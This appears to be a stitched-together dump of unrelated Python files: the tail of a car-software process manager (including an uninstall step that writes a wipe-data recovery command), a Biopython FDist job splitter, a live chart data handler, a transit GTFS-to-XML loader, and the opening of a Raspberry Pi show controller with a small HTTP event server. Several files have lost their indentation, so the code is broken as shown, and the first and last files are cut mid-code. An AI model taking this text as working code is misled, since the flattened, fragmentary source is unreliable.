start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
Async.py
|
# Copyright 2007 by Tiago Antao <tiagoantao@gmail.com>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Asynchronous execution of Fdist and spliting of loads.
FDistAsync Allows for the execution of FDist.
SplitFDist splits a single Fdist execution in several, taking advantage
of multi-core architectures.
"""
import os
import shutil
import threading
from time import sleep
from Bio.PopGen.Async import Local
from Bio.PopGen.FDist.Controller import FDistController
__docformat__ = "restructuredtext en"
class FDistAsync(FDistController):
"""Asynchronous FDist execution.
"""
def __init__(self, fdist_dir="", ext=None):
"""Constructor.
Parameters:
- fdist_dir - Where fdist can be found, if = "", then it
should be on the path.
- ext - Extension of binary names (e.g. nothing on Unix,
".exe" on Windows
"""
FDistController.__init__(self, fdist_dir, ext)
def run_job(self, parameters, input_files):
"""Runs FDist asynchronously.
Gets typical Fdist parameters from a dictionary and
makes a "normal" call. This is run, normally, inside
a separate thread.
"""
npops = parameters['npops']
nsamples = parameters['nsamples']
fst = parameters['fst']
sample_size = parameters['sample_size']
mut = parameters.get('mut', 0)
num_sims = parameters.get('num_sims', 20000)
data_dir = parameters.get('data_dir', '.')
is_dominant = parameters.get('is_dominant', False)
theta = parameters.get('theta', 0.06)
beta = parameters.get('beta', (0.25, 0.25))
max_freq = parameters.get('max_freq', 0.99)
fst = self.run_fdist(npops, nsamples, fst, sample_size,
mut, num_sims, data_dir,
is_dominant, theta, beta,
max_freq)
output_files = {}
output_files['out.dat'] = open(data_dir + os.sep + 'out.dat', 'r')
return fst, output_files
class SplitFDist(object):
"""Splits a FDist run.
    The idea is to split a certain number of simulations into smaller
    batches (e.g. 30,000 sims split into 30 packets of 1,000). This
    allows simulations to run in parallel, thus taking advantage
    of multi-core CPUs.
Each SplitFDist object can only be used to run a single FDist
simulation.
"""
def __init__(self, report_fun=None,
num_thr=2, split_size=1000, fdist_dir='', ext=None):
"""Constructor.
Parameters:
- report_fun - Function that is called when a single packet is
run, it should have a single parameter: Fst.
- num_thr - Number of desired threads, typically the number
of cores.
- split_size - Size that a full simulation will be split in.
- ext - Binary extension name (e.g. nothing on Unix, '.exe' on
Windows).
"""
self.async = Local.Local(num_thr)
self.async.hooks['fdist'] = FDistAsync(fdist_dir, ext)
self.report_fun = report_fun
self.split_size = split_size
# There might be races when reporting...
def monitor(self):
"""Monitors and reports (using report_fun) execution.
Every time a partial simulation ends, calls report_fun.
IMPORTANT: monitor calls can be concurrent with other
        events, i.e. a task might end while report_fun is being
        called. This means that report_fun should assume that
other events might be happening while it is running (it
can call acquire/release if necessary).
"""
while(True):
sleep(1)
self.async.access_ds.acquire()
keys = list(self.async.done.keys()) # copy it
self.async.access_ds.release()
for done in keys:
self.async.access_ds.acquire()
fst, files = self.async.done[done]
del self.async.done[done]
out_dat = files['out.dat']
f = open(self.data_dir + os.sep + 'out.dat', 'a')
f.writelines(out_dat.readlines())
f.close()
out_dat.close()
self.async.access_ds.release()
for file in os.listdir(self.parts[done]):
os.remove(self.parts[done] + os.sep + file)
os.rmdir(self.parts[done])
if self.report_fun:
self.report_fun(fst)
self.async.access_ds.acquire()
if len(self.async.waiting) == 0 and len(self.async.running) == 0 \
and len(self.async.done) == 0:
break
self.async.access_ds.release()
def acquire(self):
"""Allows the external acquisition of the lock.
"""
self.async.access_ds.acquire()
def release(self):
"""Allows the external release of the lock.
"""
self.async.access_ds.release()
# You can only run a fdist case at a time
def run_fdist(self, npops, nsamples, fst, sample_size,
mut=0, num_sims=20000, data_dir='.',
is_dominant=False, theta=0.06, beta=(0.25, 0.25),
max_freq=0.99):
"""Runs FDist.
Parameters can be seen on FDistController.run_fdist.
It will split a single execution in several parts and
create separated data directories.
"""
num_parts = num_sims // self.split_size
self.parts = {}
self.data_dir = data_dir
for directory in range(num_parts):
full_path = data_dir + os.sep + str(directory)
try:
os.mkdir(full_path)
except OSError:
                pass  # It's ok if it is already there
if "ss_file" in os.listdir(data_dir):
shutil.copy(data_dir + os.sep + "ss_file", full_path)
id = self.async.run_program('fdist', {
'npops': npops,
'nsamples': nsamples,
'fst': fst,
'sample_size': sample_size,
'mut': mut,
'num_sims': self.split_size,
'data_dir': full_path,
'is_dominant': is_dominant,
'theta': theta,
'beta': beta,
'max_freq': max_freq
}, {})
self.parts[id] = full_path
threading.Thread(target=self.monitor).run()
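# Illustrative sketch only (not part of the original module): driving
# SplitFDist as described in its docstring. All parameter values below are
# hypothetical, and fdist is assumed to be available on the PATH.
def _example_split_run():
    fsts = []

    def report(fst):
        # Called once per finished packet; may run concurrently with monitor().
        fsts.append(fst)

    split = SplitFDist(report_fun=report, num_thr=2, split_size=1000)
    # 20000 simulations are split into 20 packets of 1000 each.
    split.run_fdist(npops=15, nsamples=10, fst=0.1, sample_size=50,
                    num_sims=20000, data_dir='.')
    return fsts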
|
datahandler.py
|
import time
import logging
from enum import Enum
from threading import Thread, Lock
from tornado import gen
import pandas as pd
_logger = logging.getLogger(__name__)
class UpdateType(Enum):
    ADD = 1
    UPDATE = 2
class LiveDataHandler:
'''
Handler for live data
'''
def __init__(self, doc, app, figid, lookback, fill_gaps=True, timeout=1):
# doc of client
self._doc = doc
# app instance
self._app = app
# figurepage id
self._figid = figid
# lookback length
self._lookback = lookback
# should gaps be filled
self._fill_gaps = fill_gaps
# timeout for thread
self._timeout = timeout
# figurepage
self._figurepage = app.get_figurepage(figid)
# thread to process new data
self._thread = Thread(target=self._t_thread, daemon=True)
self._lock = Lock()
self._running = True
self._new_data = False
self._datastore = None
self._last_idx = -1
self._patches = []
self._cb_patch = None
self._cb_add = None
        # initial fill of datastore
self._fill()
# start thread
self._thread.start()
def _fill(self):
'''
Fills datastore with latest values
'''
df = self._app.generate_data(
figid=self._figid,
back=self._lookback,
preserveidx=True,
fill_gaps=self._fill_gaps)
self._set_data(df)
# init by calling set_cds_columns_from_df
# after this, all cds will already contain data
self._figurepage.set_cds_columns_from_df(self._datastore)
def _set_data(self, data, idx=None):
'''
Replaces or appends data to datastore
'''
with self._lock:
if isinstance(data, pd.DataFrame):
self._datastore = data
self._last_idx = -1
elif isinstance(data, pd.Series):
if idx is None:
self._datastore = self._datastore.append(data)
else:
self._datastore.at[idx] = data
else:
raise Exception('Unsupported data provided')
self._datastore = self._datastore.tail(
self._get_data_stream_length())
@gen.coroutine
def _cb_push_adds(self):
'''
Streams new data to all ColumnDataSources
'''
# take all rows from datastore that were not yet streamed
update_df = self._datastore[self._datastore['index'] > self._last_idx]
# skip if we don't have new data
if update_df.shape[0] == 0:
return
# store last index of streamed data
self._last_idx = update_df['index'].iloc[-1]
fp = self._figurepage
# create stream data for figurepage
data = fp.get_cds_streamdata_from_df(update_df)
if data:
_logger.debug(f'Sending stream for figurepage: {data}')
fp.cds.stream(
data, self._get_data_stream_length())
# create stream df for every figure
for f in fp.figures:
data = f.get_cds_streamdata_from_df(update_df)
if data:
_logger.debug(f'Sending stream for figure: {data}')
f.cds.stream(data, self._get_data_stream_length())
@gen.coroutine
def _cb_push_patches(self):
'''
Pushes patches to all ColumnDataSources
'''
# get all rows to patch
patches = []
while len(self._patches) > 0:
patches.append(self._patches.pop(0))
# skip if no patches available
if len(patches) == 0:
return
for patch in patches:
fp = self._figurepage
# patch figurepage
p_data, s_data = fp.get_cds_patchdata_from_series(patch)
if len(p_data) > 0:
_logger.debug(f'Sending patch for figurepage: {p_data}')
fp.cds.patch(p_data)
if len(s_data) > 0:
_logger.debug(f'Sending stream for figurepage: {s_data}')
fp.cds.stream(
s_data, self._get_data_stream_length())
# patch all figures
for f in fp.figures:
# only fill with nan if not filling gaps
if not self._fill_gaps:
c_fill_nan = f.fill_nan()
else:
c_fill_nan = []
# get patch data
p_data, s_data = f.get_cds_patchdata_from_series(
patch, c_fill_nan)
if len(p_data) > 0:
_logger.debug(f'Sending patch for figure: {p_data}')
f.cds.patch(p_data)
if len(s_data) > 0:
_logger.debug(f'Sending stream for figure: {s_data}')
f.cds.stream(
s_data, self._get_data_stream_length())
def _push_adds(self):
doc = self._doc
try:
doc.remove_next_tick_callback(self._cb_add)
except ValueError:
pass
self._cb_add = doc.add_next_tick_callback(
self._cb_push_adds)
def _push_patches(self):
doc = self._doc
try:
doc.remove_next_tick_callback(self._cb_patch)
except ValueError:
pass
self._cb_patch = doc.add_next_tick_callback(
self._cb_push_patches)
def _process(self, rows):
'''
Request to update data with given rows
'''
for idx, row in rows.iterrows():
if (self._datastore.shape[0] > 0
and idx in self._datastore['index']):
update_type = UpdateType.UPDATE
else:
update_type = UpdateType.ADD
if update_type == UpdateType.UPDATE:
ds_idx = self._datastore.loc[
self._datastore['index'] == idx].index[0]
self._set_data(row, ds_idx)
self._patches.append(row)
self._push_patches()
else:
# append data and remove old data
self._set_data(row)
self._push_adds()
def _t_thread(self):
'''
Thread method for datahandler
'''
while self._running:
if self._new_data:
last_idx = self.get_last_idx()
last_avail_idx = self._app.get_last_idx(self._figid)
if last_avail_idx - last_idx > (2 * self._lookback):
                    # if there is more new data than the lookback length
# don't load from last index but from end of data
data = self._app.generate_data(
back=self._lookback,
preserveidx=True,
fill_gaps=self._fill_gaps)
else:
                    # if there is just some new data (less than lookback)
# load from last index, so no data is skipped
data = self._app.generate_data(
start=last_idx,
preserveidx=True,
fill_gaps=self._fill_gaps)
self._new_data = False
self._process(data)
time.sleep(self._timeout)
def _get_data_stream_length(self):
'''
Returns the length of data stream to use
'''
return min(self._lookback, self._datastore.shape[0])
def get_last_idx(self):
'''
Returns the last index in local datastore
'''
if self._datastore.shape[0] > 0:
return self._datastore['index'].iloc[-1]
return -1
def set(self, df):
'''
Sets a new df and streams data
'''
self._set_data(df)
self._push_adds()
def update(self):
'''
Notifies datahandler of new data
'''
if self._running:
self._new_data = True
def stop(self):
'''
Stops the datahandler
'''
# mark as not running
self._running = False
# ensure no pending calls are set
try:
self._doc.remove_next_tick_callback(self._cb_patch)
except ValueError:
pass
try:
self._doc.remove_next_tick_callback(self._cb_add)
except ValueError:
pass
        # it would not really be necessary to join this thread but doing
# it for readability
self._thread.join(0)
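# Illustrative sketch only (not part of the original module): the expected
# call pattern for LiveDataHandler. "doc", "app" and "figid" stand for the
# Bokeh document, the hosting app object and a figurepage id; all of them are
# assumptions about the surrounding application.
def _example_usage(doc, app, figid=0):
    handler = LiveDataHandler(doc, app, figid, lookback=100)
    # whenever the app has produced new rows, just notify the handler;
    # its worker thread pulls the data and pushes streams/patches itself
    handler.update()
    # on shutdown
    handler.stop()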
|
staticfiles.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Jolla Ltd.
# Contact: Jussi Pakkanen <jussi.pakkanen@jolla.com>
# All rights reserved.
#
# You may use this file under the terms of BSD license as follows:
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Jolla Ltd nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This file demonstrates how to write a class that downloads data from the
# net, does heavy processing or some other operation that takes a long time.
# To keep the UI responsive we do the operations in a separate thread and
# send status updates via signals.
import pyotherside
import threading
import time
import zipfile
import os
import urllib.request
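# Illustrative sketch only (not part of the original file): the thread +
# signal pattern described in the header comment. The "processing_done"
# signal name is an assumption for this sketch; slow_function itself is
# defined below and is only looked up when the worker actually runs.
def _example_background_call(*args):
    def worker():
        slow_function(*args)
        pyotherside.send('processing_done')
    threading.Thread(target=worker, daemon=True).start()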
def slow_function(path, ifile, ofile, country, city, static, version, selected_stops):
if not os.path.exists(path):
os.makedirs(path)
finfile = path + ifile
foutfile = path + ofile
#with zipfile.ZipFile(path + '209.zip') as myzip:
#with myzip.open('stops.txt', 'rU') as myfile:
#myfiles = myfile.read().decode('UTF-8'))
#print(myfile.read())
#for line in myfiles:
#line = line.replace('"','')
#row0 = line.split(",")
#pyotherside.send('message', row0[0], row0[2], row[3])
if ifile == "loaddata":
zip_source = static
zip_target = path + city + '.zip'
pyotherside.send('message', "Loaded", "all", "data!", zip_source, zip_target)
urllib.request.urlretrieve(zip_source, zip_target)
pyotherside.send('message', "Loaded", "all", "data!")
elif ifile == "unzip":
with zipfile.ZipFile(path + city + '.zip', 'r') as zip_ref:
zip_ref.extractall(path)
pyotherside.send('message', "Unzipped", "all", "data!")
elif ifile == "calendar.txt":
        # delete files that are no longer needed
        if os.path.exists(path + "/" + city + ".zip"):
            pyotherside.send('message', "The", city, ".zip exists!")
            os.remove(path + "/" + city + ".zip")
        for leftover in ("shapes.txt", "agency.txt", "contracts.txt",
                         "feed_info.txt", "transfers.txt", "translations.txt",
                         "stops2.txt", "stops_old.txt"):
            if os.path.exists(path + leftover):
                pyotherside.send('message', "The", "file " + leftover, "exists!")
                os.remove(path + leftover)
#
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<calendar>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[1] + '>' + row[1] + '</' + row0[1] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>')
outfile.write('<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>')
outfile.write('<' + row0[5] + '>' + row[5] + '</' + row0[5] + '>')
outfile.write('<' + row0[6] + '>' + row[6] + '</' + row0[6] + '>')
outfile.write('<' + row0[7] + '>' + row[7] + '</' + row0[7] + '>')
outfile.write('<' + row0[8] + '>' + row[8] + '</' + row0[8] + '>')
outfile.write('<' + row0[9] + '>' + row[9] + '</' + row0[9] + '>')
outfile.write('</calendar>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "calendar.txt"):
pyotherside.send('message', "The", "file calendar.txt", "exist!")
os.remove(path+ "calendar.txt")
ifile = "calendar_dates.txt"
ofile = "calendar_dates.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<calendar_dates>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[1] + '>' + row[1] + '</' + row0[1] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('</calendar_dates>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "calendar_dates.txt"):
pyotherside.send('message', "The", "file calendar_dates.txt", "exist!")
os.remove(path+ "calendar_dates.txt")
ifile = "routes.txt"
ofile = "routes.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<routes>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>')
outfile.write('</routes>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "routes.txt"):
pyotherside.send('message', "The", "file routes.txt", "exist!")
os.remove(path+ "routes.txt")
ifile = "stops.txt"
ofile = "stops.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
elif version == '2.0':
outfile.write('<stop>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>')
outfile.write('<' + row0[5] + '>' + row[5] + '</' + row0[5] + '>')
outfile.write('</stop>'+ '\n')
else:
outfile.write('<stop>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>')
outfile.write('<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>')
outfile.write('</stop>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city, version)
if os.path.exists(path+ "stops.txt"):
pyotherside.send('message', "The", "file stops.txt", "exist!")
os.remove(path+ "stops.txt")
ifile = "trips.txt"
ofile = "trips.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<trips>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[1] + '>' + row[1] + '</' + row0[1] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('</trips>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "trips.txt"):
pyotherside.send('message', "The", "file trips.txt", "exist!")
os.remove(path+ "trips.txt")
elif ifile == "stop_times.txt":
ifile = "stop_times.txt"
ofile = "stop_times.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
savebatch = 0
batch = ''
batch_print = ''
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
row = line.split(",")
if row[4] == "1":
start_time = row[2]
if savebatch ==1:
batch_print = batch
batch = ''
savebatch = 0
if row[3] in selected_stops:
savebatch = 1
#pyotherside.send('message', "in stops", ifile, ofile, country, city)
batch+='<stoptime>'
batch+='<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>'
batch+='<' + 'start_time' + '>' + start_time + '</' + 'start_time' + '>'
batch+='<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>'
batch+='<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>'
batch+='<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>'
batch+='</stoptime>'+ '\n'
if batch_print != '':
outfile.write(batch_print)
batch_print = ''
# Write the final batch explicitly: batch_print is only flushed when the next trip starts, so the last collected batch would otherwise never reach the file. This may append some extra, unfiltered data at the end, which is accepted to keep the logic simple.
outfile.write(batch)
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "stop_times.txt"):
pyotherside.send('message', "The", "file stop_times.txt", "exist!")
#os.remove(path+ "stop_times.txt")
else:
pyotherside.send('message', "path", "ifile", "ofile", "country", "city")
pyotherside.send('finished', 'Dataloading')
class Sloader:
def __init__(self):
# Set bgthread to a finished thread so we never
# have to check if it is None.
self.bgthread = threading.Thread()
self.bgthread.start()
def download(self, path, ifile, ofile, country, city, static, version, selected_stops):
self.path = path
self.ifile = ifile
self.ofile = ofile
self.country = country
self.city = city
self.static = static
self.version = version
self.selected_stops = selected_stops
if self.bgthread.is_alive():
return
self.bgthread = threading.Thread(target=slow_function, args=(self.path,self.ifile,self.ofile,self.country,self.city,self.static,self.version,self.selected_stops,))
self.bgthread.start()
sloader = Sloader()
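# Added usage sketch (not part of the original module; the module name, path, URL
# and city below are hypothetical): the QML side imports this file through
# pyotherside and starts the background work with something like
#     call('gtfsloader.sloader.download',
#          ['/home/user/.local/share/gtfs/', 'loaddata', '', 'fi', 'helsinki',
#           'http://example.com/gtfs.zip', '2.0', []])
# Progress is reported back through the pyotherside.send('message', ...) calls in
# slow_function and the final pyotherside.send('finished', 'Dataloading').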
|
Wootopia 1_6_6.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Version 1.6.6
# Imports for the slider
from __future__ import absolute_import, division, print_function, unicode_literals
try:
import pi3d
except:
print("IMPORT Pi3D ERROR!")
pass
import os
import subprocess
import struct
import time
import random
import ast
import threading
# Import for the RS232 serial port
import serial
# Imports for the OMXPlayer wrapper
try:
from omxplayer.player import OMXPlayer
except:
print("IMPORT OMXPLAYER ERROR!")
pass
# Import for sending commands to the IP video player
import socket
# Imports for input events (IR remote control)
try:
import evdev, selectors
except:
print("IMPORT MODULE EVDEV ERROR!")
pass
# Imports for XML parsing
import xml.etree.ElementTree as ET
# Imports for GPIO
import RPi.GPIO as GPIO
# HTTP server:begin
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer
class S(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_response()
if self.path=='/':
with open("imeens.html","r") as f:
self.wfile.write(f.read().encode('utf-8'))
else:
self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
if self.path[1:] in Scenario["Evenements"]["http"]:
TraiteEvenement(Scenario["Evenements"]["http"][self.path[1:]])
def do_POST(self):
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
post_data = self.rfile.read(content_length) # <--- Gets the data itself
print("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",str(self.path), str(self.headers), post_data.decode('utf-8'))
self._set_response()
self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))
def log_message(self, format, *args):
return
def run_http(server_class=HTTPServer, handler_class=S, port=8080):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
class http_listener(Thread):
def run(self):
run_http()
http_listener().start()
# HTTP server: end
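# Added note: any GET on a path other than '/' is matched against the keys of
# Scenario["Evenements"]["http"], and a match dispatches the mapped event through
# TraiteEvenement(). Assuming an http event with value "ecran_on" is declared in
# Wootopia.xml, it could be triggered with e.g.:
#     curl http://<raspberry-ip>:8080/ecran_on
# (the event value is a hypothetical example; 8080 is the default port of run_http)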
# Open the RS232 port
try:
RS232=serial.Serial("/dev/ttyUSB0", baudrate = 9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1)
RS232_ok=True
except:
print("RS232_1 NOT FOUND")
RS232_ok=False
pass
# RS232 receive port
try:
RS232_receive=serial.Serial("/dev/ttyUSB0", baudrate = 9600,parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS, timeout=1)
if (RS232_receive):
RS232_receive_ok=True
except:
RS232_receive_ok=False
pass
# Open the RS232_2 port
try:
RS232_2=serial.Serial("/dev/ttyUSB1", baudrate = 9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1)
RS232_2_ok=True
except:
print("RS232_2 NOT FOUND")
RS232_2_ok=False
pass
# RS232_2 receive port
try:
RS232_2_receive=serial.Serial("/dev/ttyUSB1", baudrate = 9600,parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS, timeout=1)
if (RS232_2_receive):
RS232_2_receive_ok=True
except:
RS232_2_receive_ok=False
pass
Medias_path='medias'
GPIO.setmode(GPIO.BCM)
# LED and DMX GPIO numbers - see https://pinout.xyz/
# GPIO4 is available on the V3 HAT PCB
gpio_in4=4
# GPIO21 corresponds to PCM DOUT (pin 40), available on the V3 HAT PCB
led21=21
led22=22
# DMX pin assignment - do not change these values
# GPIO 10 and 11 are reserved for the RGB LED bus
dmx0=26
dmx1=13
dmx2=16
dmx3=12
dmx4=6
dmx5=24
dmx6=23
GPIO.setup(gpio_in4, GPIO.IN)
#GPIO.setup(led21, GPIO.OUT)
#GPIO.setup(led22, GPIO.OUT)
GPIO.setup([dmx0,dmx1,dmx2,dmx3,dmx4,dmx5,dmx6], GPIO.OUT)
# Video input
PI3D_window_name="PI3Dwootopia"
VideoInput_window_name="ffplaywootopia"
VideoInputCommand="ffplay /dev/video0 -loop 0 -noborder -an -left 0 -top 0 -x 1280 -y 1024 -loglevel quiet -window_title " + VideoInput_window_name
# Imports for Skywriter
try :
import skywriter
except:
print('Avertissement : PAD non detecte')
pass
Debug=False
azerty_hid_codes = {
'a' : (0, 20), 'b' : (0, 5), 'c' : (0, 6), 'd' : (0, 7), 'e' : (0, 8), 'f' : (0, 9),
'g' : (0, 10), 'h' : (0, 11), 'i' : (0, 12), 'j' : (0, 13), 'k' : (0, 14), 'l' : (0, 15),
'm' : (0, 51), 'n' : (0, 17), 'o' : (0, 18), 'p' : (0, 19), 'q' : (0, 4), 'r' : (0, 21),
's' : (0, 22), 't' : (0, 23), 'u' : (0, 24), 'v' : (0, 25), 'w' : (0, 29), 'x' : (0, 27),
